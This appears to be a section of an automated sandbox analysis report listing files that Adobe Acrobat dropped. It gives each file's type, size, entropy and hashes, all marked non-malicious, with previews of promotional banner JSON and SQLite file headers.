                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):295
                                                                                                    Entropy (8bit):5.305388420977768
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YEQXJ2HX3Dlo77+FIbRI6XVW7+0YzoAvJM3g98kUwPeUkwRe9:YvXKX3Dl6yYpW7RGMbLUkee9
                                                                                                    MD5:BB8DC2A7F74694913955978CC083BF14
                                                                                                    SHA1:B2537EDC83C8E4464A07C6B80AC095D1BC91294E
                                                                                                    SHA-256:867485F13327F233B18A7252BCABE3F148EECB0058BE7A465BFEB71E5E10FB89
                                                                                                    SHA-512:7B1CA193631E8FC5AE3DD8DF9957309EE4E7FB2F503E9F9E132914532E81618560546E4B01C68E8D67AE3D51E4FCF3367AF9B8701FCBC301F00FD1EF8371ABAE
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):294
                                                                                                    Entropy (8bit):5.238390083876533
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YEQXJ2HX3Dlo77+FIbRI6XVW7+0YzoAvJfBoTfXpnrPeUkwRe9:YvXKX3Dl6yYpW7RGWTfXcUkee9
                                                                                                    MD5:598C3D7DE10C33B6FBB0A72D9196C731
                                                                                                    SHA1:9528148BF15B7DE07641A435E69CDD6A35B33799
                                                                                                    SHA-256:7C675227F3B0DFC1177A668FC396C7665A38DFC74D449ABD12F1875C1E5155D9
                                                                                                    SHA-512:1F79F57A2E4EE140D2D16AEB080209B2AD0A33FEC4626CC1CEB16660FAC28EB79286A86694380B865735E619D4AC15B29E4488E1196BB9F573B090BF0BEE8D01
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):294
                                                                                                    Entropy (8bit):5.217715006715126
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YEQXJ2HX3Dlo77+FIbRI6XVW7+0YzoAvJfBD2G6UpnrPeUkwRe9:YvXKX3Dl6yYpW7RGR22cUkee9
                                                                                                    MD5:855B7B41D330C6636B2A7FFFCCEC520C
                                                                                                    SHA1:2EB9CC1662BC44F749A23F09A9F5B6047C305B62
                                                                                                    SHA-256:D5E273555E6D25D01F003FDB03BF0FD242737273EABA109735B6D2A993AD541F
                                                                                                    SHA-512:AC61310B4F8653DF158D286C77A97C42D9DE93DC26852D9F0C86314955DAE2281AE5ED753387EB729915C7CD19A07D37EABC04B849328642514D3F135BA8D861
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):285
                                                                                                    Entropy (8bit):5.282247089321549
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YEQXJ2HX3Dlo77+FIbRI6XVW7+0YzoAvJfPmwrPeUkwRe9:YvXKX3Dl6yYpW7RGH56Ukee9
                                                                                                    MD5:56F95BDF81408A3A4D011D581A303114
                                                                                                    SHA1:7ED26056AF8672CD87C266BDFBEB633B08CB9DF8
                                                                                                    SHA-256:5511168497D2B366FF391274FF511F820972163D594D92AD9AED75D495E6831C
                                                                                                    SHA-512:DF0A60245D1AFFFB1399823A730CFF9B63249C76E539C22489F53C47AA84F7FE2ACF1557DC92E77593AF7E7780D3DA6444A6A21C97048A63F70968D1108798BB
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1123
                                                                                                    Entropy (8bit):5.686304674205048
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Yv6Xzl6XiWpLgE9cQx8LennAvzBvkn0RCmK8czOCCSA:YvAXWhgy6SAFv5Ah8cv/A
                                                                                                    MD5:39ECB8B30B7FC3B5F6F155FC7147EA89
                                                                                                    SHA1:AFEDDA3C5B9CE4D74372DD4B5A1444D0D8DBB73B
                                                                                                    SHA-256:2A51D032C9DA9BE5D4FB9457993E3A057D953EBD51F9F952B200A438645F924E
                                                                                                    SHA-512:45988A066AAF36D43A9E92A3799D8BFBCEEF09F318EE8D0CA05066CB0172DC57E8B4BF87FF490BB9C53EE91A0EF16FF88524D8B39BF42A01C4020696FCB876C7
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):289
                                                                                                    Entropy (8bit):5.2250632227103555
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YEQXJ2HX3Dlo77+FIbRI6XVW7+0YzoAvJf8dPeUkwRe9:YvXKX3Dl6yYpW7RGU8Ukee9
                                                                                                    MD5:E69E97A443C8BF305CBACDD1FA0BAD03
                                                                                                    SHA1:E56CEE42DCC844C2CB30698DB6F305ADE7C9FF0C
                                                                                                    SHA-256:738EDCB0080915C7B0B9C831BCD2F03B543AA4688066CBA43CF9A65AC5D0E613
                                                                                                    SHA-512:A86726C53BEC714BFF6432330B08637391C9EBE07A8B976236DB74C62CEED9896FE1CFC42B2AFDE3A734C831F7A5A2A5C4FEDB71493628AAD047C6FB0217C756
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):5.226315394386557
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YEQXJ2HX3Dlo77+FIbRI6XVW7+0YzoAvJfQ1rPeUkwRe9:YvXKX3Dl6yYpW7RGY16Ukee9
                                                                                                    MD5:AFC494B018983114EF942AD14634336E
                                                                                                    SHA1:8A57D02FF9E80F3D73655899FE1420006F4FBB52
                                                                                                    SHA-256:55FDBE7F7E4CC99EEFD1FE706FE182E674E24A592A34D3FBED94A46389D9B59D
                                                                                                    SHA-512:8C88D238644428AD4B70DA8007698A4FB45B5C6DF28AFC5CDD6EC13B7B83C6548AC3A618C96F9B26AC2983868EDC5272C057C18B10F86612EF68FF7F371386B5
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):289
                                                                                                    Entropy (8bit):5.246585451640281
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YEQXJ2HX3Dlo77+FIbRI6XVW7+0YzoAvJfFldPeUkwRe9:YvXKX3Dl6yYpW7RGz8Ukee9
                                                                                                    MD5:399E80109C2121597F459167C31C2652
                                                                                                    SHA1:037FD2993822F4C2F742CA8616B71B8C3A3C8FFF
                                                                                                    SHA-256:991E3B2477D47C76421076979AE9043B9AEF86C81B48472F00C6F21580B3B4BD
                                                                                                    SHA-512:DAC21FEE9C0F30D738983F669603BE89189C923BD6745DD64E8E53D172608A26B38B17505171DCD7B97BD815BB06AA13096D0F419B93847E1911FFCB26E0448E
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):295
                                                                                                    Entropy (8bit):5.2527079872869
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YEQXJ2HX3Dlo77+FIbRI6XVW7+0YzoAvJfzdPeUkwRe9:YvXKX3Dl6yYpW7RGb8Ukee9
                                                                                                    MD5:02AEDE5E643E4A08E9604AF76185CB2A
                                                                                                    SHA1:1FE620192522E72BAE5A7C7003486AF73784D577
                                                                                                    SHA-256:BCB0DE776DA85F94FF9A5A0253C89AE666FE69455EA31FC8F3C77234656DAC6F
                                                                                                    SHA-512:0DB76909B3974D0DF16F60D9D0E251394CBC4CAD02DDD79BD66D00AE988CCF14B98CB0CCC4AA45EF3216171046E4B6F44646974AF6F5D115550488FBFF825A48
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):289
                                                                                                    Entropy (8bit):5.232245353600277
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YEQXJ2HX3Dlo77+FIbRI6XVW7+0YzoAvJfYdPeUkwRe9:YvXKX3Dl6yYpW7RGg8Ukee9
                                                                                                    MD5:8FC3D13AA2E6839DB27F1DCD3AF6AF8F
                                                                                                    SHA1:65C0595AFDD783CADAE3DFC166B6DD8106518016
                                                                                                    SHA-256:FF3CA0855622BD4A8C02AC275DFC97EEA148FF7609301A32EBD9F65EE8FAA2AF
                                                                                                    SHA-512:E1B4EB67290F5FEEBB85E2199D6AA4458D9A9F915488BC7576FA92676B1269436206BA3DE03E4E48BAC3E928098430AA27A5105D8408F4FE5EEAD27E9BBB1A9E
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):284
                                                                                                    Entropy (8bit):5.218205805463124
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YEQXJ2HX3Dlo77+FIbRI6XVW7+0YzoAvJf+dPeUkwRe9:YvXKX3Dl6yYpW7RG28Ukee9
                                                                                                    MD5:B3CDA370A6F50F040F622DBF90F0FA27
                                                                                                    SHA1:27DC326EA751FD033CDC878A5FD7228789159CC9
                                                                                                    SHA-256:B189DF23F12284B43E985D6AC63A569C5A142F0E7184E6FEEA7E8417272BBB18
                                                                                                    SHA-512:55221D454FC80CFD89808A21D9911C2170EF0DF83A5C19DE9176B60ECC62E52DCE4CB706A2E5C911E8D373D51588BDA724A12C5CF3AC10CB7D3DFD591B731319
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):291
                                                                                                    Entropy (8bit):5.216258118946991
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YEQXJ2HX3Dlo77+FIbRI6XVW7+0YzoAvJfbPtdPeUkwRe9:YvXKX3Dl6yYpW7RGDV8Ukee9
                                                                                                    MD5:C3B37B380CEC1CF9794DDCD5B60D0776
                                                                                                    SHA1:E8A681BFF234B677447C65536F492F9ABC49652C
                                                                                                    SHA-256:6A35009DDC629C167BB88BB76369A5B1F6C620D4075841A56C22347DC6599985
                                                                                                    SHA-512:190C80D00A6524DC47B8E7998D01C058BE4264ACE895B1D8834049D52702501AEF1413FB247E4CA2EE13C43D8F110C0A97B541138F7F504C0F8BA6DA822C3CDE
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):287
                                                                                                    Entropy (8bit):5.217289378329799
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YEQXJ2HX3Dlo77+FIbRI6XVW7+0YzoAvJf21rPeUkwRe9:YvXKX3Dl6yYpW7RG+16Ukee9
                                                                                                    MD5:CD52E306BD523050C4B19F43E567C8E2
                                                                                                    SHA1:EA585C6AB36DB2886F328F289C778D4565A91CBD
                                                                                                    SHA-256:89D0345EF7B649128F13A5371DC48DAFCF3CE0F652FBC3467E823B90F4E2CB00
                                                                                                    SHA-512:D7E231675C673C9FDDE2984D14C92A7E0456B032D5A96A0220C741391577AB7B04AD758C131BCAF5FE4CD2C3CEC6BD1DC20CB29E33A67DE1A09303B46D3D08BF
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1090
                                                                                                    Entropy (8bit):5.657691681499348
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Yv6Xzl6XiKamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSA:YvAXEBgkDMUJUAh8cvMA
                                                                                                    MD5:6F85E3F9861ABD06A79E788B89280FCF
                                                                                                    SHA1:ACD409569FBDEAA4618371273365505A3D023BCC
                                                                                                    SHA-256:B5BD7919E78BF5350683718A0D9B93B0754DFA0975E812227D02BC33D726EFD4
                                                                                                    SHA-512:4A857FBB3B06475CFD4A7B92C9141CC613D30706A5530962E4B10B21BD426082377682296825CDBE2620B5A41C5EB8FF4AC746F0ADA2E4C43E013B76F01FEFC4
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):286
                                                                                                    Entropy (8bit):5.193184219626654
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YEQXJ2HX3Dlo77+FIbRI6XVW7+0YzoAvJfshHHrPeUkwRe9:YvXKX3Dl6yYpW7RGUUUkee9
                                                                                                    MD5:BD0481C78F3C9A7352D85C6A06776D2E
                                                                                                    SHA1:212A035A415BC27AE408294D085C007721866F63
                                                                                                    SHA-256:B2EC1F484E179CCB8750D7118B3AE8B90DFAB2DBC01A2D5758EF880DC9D57D5F
                                                                                                    SHA-512:D88E1336E38745FBF8EC288B0A56D713CDBE4E18F96AD02F2A3296F24D185813EDD4779A67E683D27BC6EC1C4A8A08520144294EB4F142DF775A59820D30FEE3
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):282
                                                                                                    Entropy (8bit):5.2088618695216065
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:YEQXJ2HX3Dlo77+FIbRI6XVW7+0YzoAvJTqgFCrPeUkwRe9:YvXKX3Dl6yYpW7RGTq16Ukee9
                                                                                                    MD5:A6B81324D22FEF66F3A8D1ECEE26A5B2
                                                                                                    SHA1:5DEC0C9E14884720B47919C1C9250E899C0C8B79
                                                                                                    SHA-256:5D6464E89908EC31230DDBE5FFA4ABCCB2730B14710516A878C14B15693104B6
                                                                                                    SHA-512:A84A2EAFE7F39CCBD7C265553C45BF10858D53A0A2578E4F82A77E22AE504B48DE13B2758071D347DE09BAC6679F8E78FCC313FFB98270230A0E1CEA5C16FD58
                                                                                                    Malicious:false
                                                                                                    Preview:{"analyticsData":{"responseGUID":"574fe146-7eb4-4ced-a8ea-f75c395a04fe","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737053352112,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):0.8112781244591328
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:e:e
                                                                                                    MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                    SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                    SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                    SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                    Malicious:false
                                                                                                    Preview:....
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2814
                                                                                                    Entropy (8bit):5.143964212928553
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:Y52BbXIFwKk8b4BPzTN5PyGCBacq8UQR9id:m2BjoZk8bMvN59+acgwu
                                                                                                    MD5:4FE9E7576B152B36AFDBE64A25FFFB33
                                                                                                    SHA1:B5F69A9EB202218FE55C31C08F7CBBBB43D55BF2
                                                                                                    SHA-256:1F6A49DE06C12A5878FB1D3F94F80E039DDE9EC4F3AF65C8359B884F0D5BA90C
                                                                                                    SHA-512:A12A4D49DE5EB109924DEC60A7E0D9E8D85D71E887B73E1082D08652A8CAF54B886A0F802277D95CAE68F86E76F773273A85CE1BC7A7ACBEFEFDFCFCB30C40C9
                                                                                                    Malicious:false
                                                                                                    Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"ab68102a0c65e279d1e30f30204146db","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736876126000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"bd3a2d00132421de703478a35865500f","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736876126000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"f44a6de370b295cc87f098ba0f9a8f39","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736876126000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"fd3b5c6d429faa3da2577045d6f268c5","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":289,"ts":1736876126000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"e9bbbe1b4427e3f8aa1386ffedc6003a","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736876126000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"dc335e3fe21efc10b1d94f337f3a67e3","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12288
                                                                                                    Entropy (8bit):0.9859843937906925
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/Sp7Bn4zJwtNBwtNbRZ6bRZ4CBnF:TVl2GL7ms6ggOVpGzutYtp6PF
                                                                                                    MD5:C1C2A0C2800FEAFC455FF9D9470A2D44
                                                                                                    SHA1:516EC96237875EC1D26F6F4BED6418EBE252A209
                                                                                                    SHA-256:B7E80F77654667114BF3797C84004C8970C0110A0A936C03A82FD832F06718A8
                                                                                                    SHA-512:B2FC2C03AFAA0D075CF613E72DAA6DFC101F4772C70CC61E57E6F4340A0BBAEAEAD132FB5B05A2269613AEFB32DD2FDF24E5F559E449A4DBC7F30BCE446BA780
                                                                                                    Malicious:false
                                                                                                    Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:SQLite Rollback Journal
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8720
                                                                                                    Entropy (8bit):1.3367361271830092
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:7+t5fAD1RZKHs/Ds/Sp7BnPzJwtNBwtNbRZ6bRZWf1RZKdqLBx/XYKQvGJF7ursG:7M5GgOVpdzutYtp6PMEqll2GL7msG
                                                                                                    MD5:5417FD226B00D0043089654D55AC6C19
                                                                                                    SHA1:4B60E6F344BB4FF71B1536F8AF7095ED8E3827D6
                                                                                                    SHA-256:EA4009F5CE567400ECEDFDE149B17C47E8ACAA342D10296D0FCE72852851BCEA
                                                                                                    SHA-512:2914799E51269E8BEA0E0F9961ED6ABD09EB13AB0AA8137C8B9CC81262ABCEF742A1248E9AFA97A3A27582E8FC68C10F02F68694BD42EA05E283175A70692DF6
                                                                                                    Malicious:false
                                                                                                    Preview:.... .c.....>ek4......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):66726
                                                                                                    Entropy (8bit):5.392739213842091
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:RNOpblrU6TBH44ADKZEgJfhp3FYRK4gPMXdGN3yJzb5EkcYyu:6a6TZ44ADEJfhdFYRK3Wb5CK
                                                                                                    MD5:3F6E0CD6BC05967DF772B80350D4EE2F
                                                                                                    SHA1:142EAA4E99F7B33312E6C92F721BADA350C7B6EB
                                                                                                    SHA-256:240B13851D52EE69A0535EF6AF30186AFE221FF09EF3DA0910B05A918395F928
                                                                                                    SHA-512:30477ACC20434D2E56119C3596354B49231EAAD1EC6E1A9240285C334D7F9FA9F9F5F34F7303558715A0CE4292ACB66D27B6057E0BCC8BC58B4D4451A35FF02A
                                                                                                    Malicious:false
